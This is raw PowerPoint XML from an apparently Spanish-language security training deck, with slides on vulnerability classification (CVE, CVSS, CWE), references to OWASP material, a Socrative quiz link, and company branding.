              <a:latin typeface="Trebuchet MS" panose="020B060302020202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5"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery Prevention Cheat Sheet</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6"/>
              </a:rPr>
              <a:t>OWASP Top 10 Proactive Controls 2018</a:t>
            </a:r>
            <a:endPar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3" name="Imagen 12" descr="Un librero con libros&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE4BC8EF-C8F9-3259-C37D-500061784A1C}"/>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9460" r="43312"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="963402"/>
            <a:ext cx="3613079" cy="5097476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Imagen 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF8F5219-40D5-1A5D-51EA-14A47DBEE61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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25096107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DB87D-251A-81D7-3A31-247E7CE68230}"/>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3607034-B3C5-0219-C070-F3E615B4F5A6}"/>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3B2D578-70E3-BEF7-32EB-B8B488F72126}"/>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Evaluación de la formación y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>feedback</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8961DD2-B111-F9CA-1E4E-86501F57EFF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162F2F92-F86F-3879-A166-AF424FD14FED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2176374" y="2352326"/>
            <a:ext cx="878788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rebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Accede al link:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://b.socrative.com/login/student/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Introduce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>el</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nombre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>clase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CIPHERBIT9988</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Socrative Teacher | Speechify">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E52FC2CD-4EEB-1BB7-AB5D-8F311FC95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30" y="4007518"/>
            <a:ext cx="2112933" cy="58664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3BB70D0-4FFC-0312-7BC8-C9B114DB92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7605" y="2693923"/>
            <a:ext cx="934652" cy="934652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6987599-4049-3921-36DC-DC2AD84C40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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41312074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8E7FC-B9D0-A838-532E-647293F41C75}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Diagrama de flujo: cinta perforada 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013CD50E-7EBD-9A28-AF8C-CC78DF01517C}"/>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descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC66A05C-F929-2548-39B6-89CA8BB6D62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1EDC6B5D-1828-60CC-2614-A0CDDD4C93BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162406" y="2976014"/>
            <a:ext cx="9593798"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>¿PREGUNTAS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D5E7DB-CA5A-B4E0-15DE-2BF60C70F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981" y="298952"/>
            <a:ext cx="5034232" cy="503423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D532DE19-AAD2-AA50-5520-35219A307F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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1903835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B6191-6230-E3B6-E48D-0F3EEBD74CA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FE8ABE5-B040-1226-1B56-D2A78D6AA07A}"/>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58BBAE3-AD79-1DDD-42E2-4F385359703C}"/>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Clasificación de vulnerabilidades</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3E9891-50F7-D224-0D38-D9484F3636A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A95EA414-BC00-A1B2-1D41-B1DEA5D3AE5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678150" y="834191"/>
            <a:ext cx="9197652" cy="590851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exposures</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F149AC-A211-98E3-6843-5CCFFAD364DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407657" y="1435457"/>
            <a:ext cx="8274887" cy="3954434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95466ECD-B13D-E165-C203-C2D89FDE02B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493141" y="5433021"/>
            <a:ext cx="1422587" cy="738664"/>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Referencias: </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVSS</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE9ED8C-7759-ED35-6A3C-79CDCE6B8C3F}"/>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426190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cielo, luz, azul&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A697BF1-C102-1226-FBA6-C3FD5F6D17A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1483739"/>
            <a:ext cx="12192000" cy="3596261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37E13761-0A38-644E-7BD0-9385BC87417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4912" r="14912" b="31070"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3926544"/>
            <a:ext cx="12200584" cy="1447716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CuadroTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3186D11E-D48C-B500-1A12-45026F9F9ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377092" y="3152931"/>
            <a:ext cx="9437816" cy="302968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2100" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Crear un mundo mejor, más eficiente, seguro y sostenible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1255D7-9C2F-8341-4279-1E2705D6EBD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4912" r="14912" b="31070"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="962963"/>
            <a:ext cx="12200584" cy="1447716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CuadroTexto 7">
            <a:hlinkClick r:id="rId5"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E6ADDBC-DBEA-DE3C-0098-6B7619EA532D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5061102" y="5403911"/>
            <a:ext cx="2069797" cy="599162"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 27265"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="99267C"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>grupooesia.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Gráfico 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A8DC54-E1A5-44E3-577A-52EA1F94530B}"/>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39477" t="38339" r="39406"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3577772" y="640092"/>
            <a:ext cx="5036457" cy="1218386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Gráfico 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE14808F-ACDB-ABD9-79BA-5BF04DF476F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94549" y="4375140"/>
            <a:ext cx="8118865" cy="747926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Imagen 1" descr="Icono&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D869928-7C23-5CF3-4BFE-92A0210770B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126923" y="6022371"/>
            <a:ext cx="446157" cy="445431"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Icono&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11084503-6D6E-58C2-BB73-5E38B78ACE3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5610085" y="6035258"/>
            <a:ext cx="441743" cy="441743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Logotipo&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E76C9D7-4235-16D3-8AE0-80DC638D2575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5096566" y="6018695"/>
            <a:ext cx="441740" cy="452783"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Imagen 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C05A89F-B09E-5179-9F90-43672E93D172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6653695" y="6095999"/>
            <a:ext cx="463826" cy="298174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92685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81166-3E7B-38B4-2307-21917018F71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D65E83E-86AC-FB14-9A1D-3AB431A8C886}"/>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F8B1089-1224-34C9-D7A1-582D6B2DBA8E}"/>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Clasificación de vulnerabilidades</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07CAC8CD-DDE2-4C23-D202-71DB090BAC0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369E75D9-1B3B-303A-2BF2-DD0563809F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567930" y="799535"/>
            <a:ext cx="9197652" cy="25703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a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Common Weakness Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
